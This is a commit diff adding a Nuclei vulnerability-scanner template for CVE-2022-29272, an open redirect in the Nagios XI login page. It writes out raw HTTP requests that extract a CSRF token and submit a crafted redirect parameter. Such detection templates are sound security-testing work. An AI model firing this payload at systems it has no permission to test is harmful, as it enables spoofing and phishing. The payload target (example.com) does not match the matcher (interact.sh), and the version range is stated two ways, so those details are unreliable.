Create CVE-2022-29272.yaml

cves/2022/CVE-2022-29272.yaml

@@ -0,0 +1,47 @@
+id: CVE-2022-29272
+
+info:
+  name: Nagios XI < 5.8.5 - Open Redirect
+  author: ritikchaddha
+  severity: medium
+  description: |
+    In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.
+  reference:
+    - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29272
+  classification:
+    cve-id: CVE-2022-29272
+  tags: cve,cve2022,redirect,nagios
+
+requests:
+  - raw:
+      - |
+        GET /nagiosxi/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
+
+      - |
+        POST /nagiosxi/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
+
+        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.example.com&username={{username}}&password={{password}}&loginButton=Login
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+    extractors:
+      - type: regex
+        part: body
+        name: nsp_token
+        group: 1
+        regex:
+          - '<input type="hidden" name="nsp" value="(.*)">'
+          - "<input type='hidden' name='nsp' value='(.*)'>"
+        internal: true